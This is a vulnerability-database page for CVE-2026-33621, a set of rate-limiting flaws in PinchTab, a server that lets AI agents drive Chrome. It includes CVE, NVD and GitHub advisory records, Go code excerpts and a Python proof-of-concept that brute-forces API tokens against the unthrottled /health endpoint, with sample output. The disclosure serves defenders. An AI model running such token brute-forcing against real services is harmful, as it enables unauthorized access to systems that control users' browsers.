CVE-2026-33621 (GCVE-0-2026-33621)
Vulnerability from cvelistv5 – Published: 2026-03-26 20:42 – Updated: 2026-03-27 13:55
VLAI?
Title
PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token
Summary
PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab's default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.
Severity ?
4.8 (Medium)
CWE
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33621",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-27T13:35:06.681795Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-27T13:55:46.976Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pinchtab",
"vendor": "pinchtab",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.7.7, \u003c 0.8.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290: Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T20:42:12.692Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
},
{
"name": "https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b"
},
{
"name": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
}
],
"source": {
"advisory": "GHSA-j65m-hv65-r264",
"discovery": "UNKNOWN"
},
"title": "PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33621",
"datePublished": "2026-03-26T20:42:12.692Z",
"dateReserved": "2026-03-23T14:24:11.616Z",
"dateUpdated": "2026-03-27T13:55:46.976Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33621\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T21:17:06.597\",\"lastModified\":\"2026-03-30T13:26:50.827\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.\"},{\"lang\":\"es\",\"value\":\"PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.7.7\u0027 hasta \u0027v0.8.4\u0027 contienen protecciones incompletas de limitaci\u00f3n de solicitudes para puntos finales verificables por autenticaci\u00f3n. En \u0027v0.7.7\u0027 hasta \u0027v0.8.3\u0027, exist\u00eda un \u0027RateLimitMiddleware\u0027 completamente implementado en \u0027internal/handlers/middleware.go\u0027 pero no fue insertado en la cadena de gestores HTTP de producci\u00f3n, por lo que las solicitudes no estaban sujetas a la limitaci\u00f3n por IP prevista. En el mismo rango pre-\u0027v0.8.4\u0027, el limitador original tambi\u00e9n identificaba a los clientes usando \u0027X-Forwarded-For\u0027, lo que habr\u00eda permitido la suplantaci\u00f3n de encabezados controlada por el cliente si el middleware hubiera estado habilitado. \u0027v0.8.4\u0027 abord\u00f3 esos dos problemas conectando el limitador a la cadena de gestores activa y cambiando la clave a la IP del par inmediato, pero a\u00fan exim\u00eda a \u0027/health\u0027 y \u0027/metrics\u0027 de la limitaci\u00f3n de velocidad a pesar de que \u0027/health\u0027 segu\u00eda siendo un punto final verificable por autenticaci\u00f3n cuando se configuraba un token. Este problema debilita la defensa en profundidad para implementaciones donde un atacante puede alcanzar la API, especialmente si se utiliza un token d\u00e9bil elegido por humanos. No es una omisi\u00f3n de autenticaci\u00f3n directa o un problema de divulgaci\u00f3n de tokens por s\u00ed mismo. PinchTab est\u00e1 documentado como local-first por defecto y utiliza \u0027127.0.0.1\u0027 m\u00e1s un token aleatorio generado en la configuraci\u00f3n recomendada. El modelo de implementaci\u00f3n predeterminado de PinchTab es un entorno local-first, controlado por el usuario, entre el usuario y sus agentes; una exposici\u00f3n m\u00e1s amplia es una elecci\u00f3n intencional del operador. Esto reduce el riesgo pr\u00e1ctico en la configuraci\u00f3n predeterminada, aunque por s\u00ed mismo no cambia las caracter\u00edsticas base intr\u00ednsecas del error. Esto fue completamente abordado en \u0027v0.8.5\u0027 aplicando \u0027RateLimitMiddleware\u0027 en la cadena de gestores de producci\u00f3n, derivando la direcci\u00f3n del cliente de la IP del par inmediato en lugar de confiar en los encabezados reenviados por defecto, y eliminando la exenci\u00f3n de \u0027/health\u0027 y \u0027/metrics\u0027 para que los puntos finales verificables por autenticaci\u00f3n tambi\u00e9n sean limitados.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N\",\"baseScore\":4.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.2,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-290\"},{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"references\":[{\"url\":\"https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33621\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-27T13:35:06.681795Z\"}}}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-27T13:34:59.175Z\"}}], \"cna\": {\"title\": \"PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token\", \"source\": {\"advisory\": \"GHSA-j65m-hv65-r264\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"pinchtab\", \"product\": \"pinchtab\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.7.7, \u003c 0.8.5\"}]}], \"references\": [{\"url\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264\", \"name\": \"https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b\", \"name\": \"https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\", \"name\": \"https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-290\", \"description\": \"CWE-290: Authentication Bypass by Spoofing\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T20:42:12.692Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33621\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-27T13:55:46.976Z\", \"dateReserved\": \"2026-03-23T14:24:11.616Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T20:42:12.692Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-33621
Vulnerability from fkie_nvd - Published: 2026-03-26 21:17 - Updated: 2026-03-30 13:26
Severity ?
Summary
PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab's default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.7.7` through `v0.8.4` contain incomplete request-throttling protections for auth-checkable endpoints. In `v0.7.7` through `v0.8.3`, a fully implemented `RateLimitMiddleware` existed in `internal/handlers/middleware.go` but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle. In the same pre-`v0.8.4` range, the original limiter also keyed clients using `X-Forwarded-For`, which would have allowed client-controlled header spoofing if the middleware had been enabled. `v0.8.4` addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted `/health` and `/metrics` from rate limiting even though `/health` remained an auth-checkable endpoint when a token was configured. This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses `127.0.0.1` plus a generated random token in the recommended setup. PinchTab\u0027s default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug. This was fully addressed in `v0.8.5` by applying `RateLimitMiddleware` in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the `/health` and `/metrics` exemption so auth-checkable endpoints are throttled as well."
},
{
"lang": "es",
"value": "PinchTab es un servidor HTTP aut\u00f3nomo que otorga a los agentes de IA control directo sobre un navegador Chrome. PinchTab \u0027v0.7.7\u0027 hasta \u0027v0.8.4\u0027 contienen protecciones incompletas de limitaci\u00f3n de solicitudes para puntos finales verificables por autenticaci\u00f3n. En \u0027v0.7.7\u0027 hasta \u0027v0.8.3\u0027, exist\u00eda un \u0027RateLimitMiddleware\u0027 completamente implementado en \u0027internal/handlers/middleware.go\u0027 pero no fue insertado en la cadena de gestores HTTP de producci\u00f3n, por lo que las solicitudes no estaban sujetas a la limitaci\u00f3n por IP prevista. En el mismo rango pre-\u0027v0.8.4\u0027, el limitador original tambi\u00e9n identificaba a los clientes usando \u0027X-Forwarded-For\u0027, lo que habr\u00eda permitido la suplantaci\u00f3n de encabezados controlada por el cliente si el middleware hubiera estado habilitado. \u0027v0.8.4\u0027 abord\u00f3 esos dos problemas conectando el limitador a la cadena de gestores activa y cambiando la clave a la IP del par inmediato, pero a\u00fan exim\u00eda a \u0027/health\u0027 y \u0027/metrics\u0027 de la limitaci\u00f3n de velocidad a pesar de que \u0027/health\u0027 segu\u00eda siendo un punto final verificable por autenticaci\u00f3n cuando se configuraba un token. Este problema debilita la defensa en profundidad para implementaciones donde un atacante puede alcanzar la API, especialmente si se utiliza un token d\u00e9bil elegido por humanos. No es una omisi\u00f3n de autenticaci\u00f3n directa o un problema de divulgaci\u00f3n de tokens por s\u00ed mismo. PinchTab est\u00e1 documentado como local-first por defecto y utiliza \u0027127.0.0.1\u0027 m\u00e1s un token aleatorio generado en la configuraci\u00f3n recomendada. El modelo de implementaci\u00f3n predeterminado de PinchTab es un entorno local-first, controlado por el usuario, entre el usuario y sus agentes; una exposici\u00f3n m\u00e1s amplia es una elecci\u00f3n intencional del operador. Esto reduce el riesgo pr\u00e1ctico en la configuraci\u00f3n predeterminada, aunque por s\u00ed mismo no cambia las caracter\u00edsticas base intr\u00ednsecas del error. Esto fue completamente abordado en \u0027v0.8.5\u0027 aplicando \u0027RateLimitMiddleware\u0027 en la cadena de gestores de producci\u00f3n, derivando la direcci\u00f3n del cliente de la IP del par inmediato en lugar de confiar en los encabezados reenviados por defecto, y eliminando la exenci\u00f3n de \u0027/health\u0027 y \u0027/metrics\u0027 para que los puntos finales verificables por autenticaci\u00f3n tambi\u00e9n sean limitados."
}
],
"id": "CVE-2026-33621",
"lastModified": "2026-03-30T13:26:50.827",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-26T21:17:06.597",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/commit/c619c43a4f29d1d1a481e859c193baf78e0d648b"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/releases/tag/v0.8.4"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/pinchtab/pinchtab/security/advisories/GHSA-j65m-hv65-r264"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-290"
},
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-J65M-HV65-R264
Vulnerability from github – Published: 2026-03-24 19:47 – Updated: 2026-03-27 21:19
VLAI?
Summary
PinchTab: Unapplied Rate Limiting Middleware Allows Unbounded Brute-Force of API Token
Details
Summary
PinchTab v0.7.7 through v0.8.4 contain incomplete request-throttling protections for auth-checkable endpoints. In v0.7.7 through v0.8.3, a fully implemented RateLimitMiddleware existed in internal/handlers/middleware.go but was not inserted into the production HTTP handler chain, so requests were not subject to the intended per-IP throttle.
In the same pre-v0.8.4 range, the original limiter also keyed clients using X-Forwarded-For, which would have allowed client-controlled header spoofing if the middleware had been enabled. v0.8.4 addressed those two issues by wiring the limiter into the live handler chain and switching the key to the immediate peer IP, but it still exempted /health and /metrics from rate limiting even though /health remained an auth-checkable endpoint when a token was configured.
This issue weakens defense in depth for deployments where an attacker can reach the API, especially if a weak human-chosen token is used. It is not a direct authentication bypass or token disclosure issue by itself. PinchTab is documented as local-first by default and uses 127.0.0.1 plus a generated random token in the recommended setup.
PinchTab's default deployment model is a local-first, user-controlled environment between the user and their agents; wider exposure is an intentional operator choice. This lowers practical risk in the default configuration, even though it does not by itself change the intrinsic base characteristics of the bug.
This was fully addressed in v0.8.5 by applying RateLimitMiddleware in the production handler chain, deriving the client address from the immediate peer IP instead of trusting forwarded headers by default, and removing the /health and /metrics exemption so auth-checkable endpoints are throttled as well.
Details
Issue 1 — Middleware never applied in v0.7.7 through v0.8.3:
The production server wrapped the HTTP mux without RateLimitMiddleware:
// internal/server/server.go — v0.8.3
handlers.LoggingMiddleware(
handlers.CorsMiddleware(
handlers.AuthMiddleware(cfg, mux),
// RateLimitMiddleware is not present here in v0.8.3
),
)
The function exists and is fully implemented:
// internal/handlers/middleware.go — v0.8.3
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// ... 120 req / 10s logic ...
})
}
Because RateLimitMiddleware was never referenced from the production handler chain in v0.7.7 through v0.8.3, the intended request throttling was inactive in those releases.
Issue 2 — X-Forwarded-For trust in the original limiter (v0.7.7 through v0.8.3):
Even if the middleware had been applied, the original IP identification was bypassable:
// internal/handlers/middleware.go — v0.8.3
host, _, _ := net.SplitHostPort(r.RemoteAddr) // real IP
if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
// No validation that request came from a trusted proxy
// Client can set this header to any value
host = strings.TrimSpace(strings.Split(xff, ",")[0])
}
// host is now client-influenced — rate limit key is spoofable
In v0.7.7 through v0.8.3, if the limiter had been enabled, a client could have influenced the rate-limit key through X-Forwarded-For. This made the original limiter unsuitable without an explicit trusted-proxy model.
Issue 3 — /health and /metrics remained exempt through v0.8.4:
v0.8.4 wired the limiter into production and switched to the immediate peer IP, but it still bypassed throttling for /health and /metrics:
// internal/handlers/middleware.go — v0.8.4
func RateLimitMiddleware(next http.Handler) http.Handler {
startRateLimiterJanitor(rateLimitWindow, evictionInterval)
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
p := strings.TrimSpace(r.URL.Path)
if p == "/health" || p == "/metrics" || strings.HasPrefix(p, "/health/") || strings.HasPrefix(p, "/metrics/") {
next.ServeHTTP(w, r)
return
}
host := authn.ClientIP(r)
// ...
})
}
That left GET /health unthrottled even though it remained an auth-checkable endpoint when a server token was configured, so online guessing against that route still saw no rate-limit response through v0.8.4.
PoC
This PoC assumes the server is reachable by the attacker and that the configured API token is weak and guessable, for example password.
PoC Code
#!/usr/bin/env python3
# brute_force_poc.py — demonstrates unthrottled token guessing on /health
import urllib.request, urllib.error, time, sys
TARGET = "http://localhost:9867/health"
WORDLIST = [f"wrong-{i:03d}" for i in range(150)] + ["password"]
counts = {}
print(f"[*] Brute-forcing {TARGET} — no rate limit protection")
start = time.time()
for token in WORDLIST:
req = urllib.request.Request(TARGET)
req.add_header("Authorization", f"Bearer {token}")
try:
with urllib.request.urlopen(req, timeout=5) as r:
print(f"[+] FOUND: token={token!r} HTTP={r.status}")
counts[r.status] = counts.get(r.status, 0) + 1
sys.exit(0)
except urllib.error.HTTPError as e:
print(f"[-] token={token!r} HTTP={e.code}")
counts[e.code] = counts.get(e.code, 0) + 1
elapsed = time.time() - start
print(f"[*] {len(WORDLIST)} attempts in {elapsed:.2f}s — "
f"{len(WORDLIST)/elapsed:.0f} req/s (no 429 received)")
print(f"[*] status counts: {counts}")
After run
python3 ratelimit.py
[*] Brute-forcing http://localhost:9867/health — no rate limit protection
[-] token='wrong-000' HTTP=401
...
[-] token='wrong-149' HTTP=401
[+] FOUND: token='password' HTTP=200
[*] 151 attempts in 0.84s — 180 req/s (no 429 received)
[*] status counts: {401: 150, 200: 1}
Observation:
1. In v0.7.7 through v0.8.3, rapid requests do not return HTTP 429 because RateLimitMiddleware is not active in production.
2. In v0.8.4, the same /health PoC still does not return HTTP 429 because /health is explicitly exempted from rate limiting.
3. The PoC succeeds only when the configured token is weak and appears in the tested candidates.
4. The original X-Forwarded-For behavior in v0.7.7 through v0.8.3 shows that the first limiter design would not have been safe to rely on behind untrusted clients.
5. This PoC does not demonstrate token disclosure or authentication bypass independent of token guessability.
Impact
- Reduced resistance to online guessing of weak or reused API tokens in deployments where an attacker can reach the API.
- Loss of the intended per-IP throttling for burst requests against protected endpoints in
v0.7.7throughv0.8.3, and against/healthinv0.8.4. - Higher abuse potential for intentionally exposed deployments than intended by the middleware design.
- This issue does not by itself disclose the token, bypass authentication, or make all deployments equally affected. Installations using the default local-first posture and generated high-entropy tokens have substantially lower practical risk.
Suggested Remediation
- Apply
RateLimitMiddlewarein the production handler chain for authenticated routes. - Derive the rate-limit key from the immediate peer IP by default instead of trusting client-supplied forwarded headers.
- Do not exempt auth-checkable endpoints such as
/healthand/metricsfrom rate limiting. - Consider an additional auth-failure throttle so repeated invalid token attempts are constrained even when endpoint-level behavior changes in the future.
Screenshot capture
Severity ?
4.8 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/pinchtab/pinchtab"
},
"ranges": [
{
"events": [
{
"introduced": "0.7.7"
},
{
"fixed": "0.8.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33621"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T19:47:40Z",
"nvd_published_at": "2026-03-26T21:17:06Z",
"severity": "MODERATE"
},
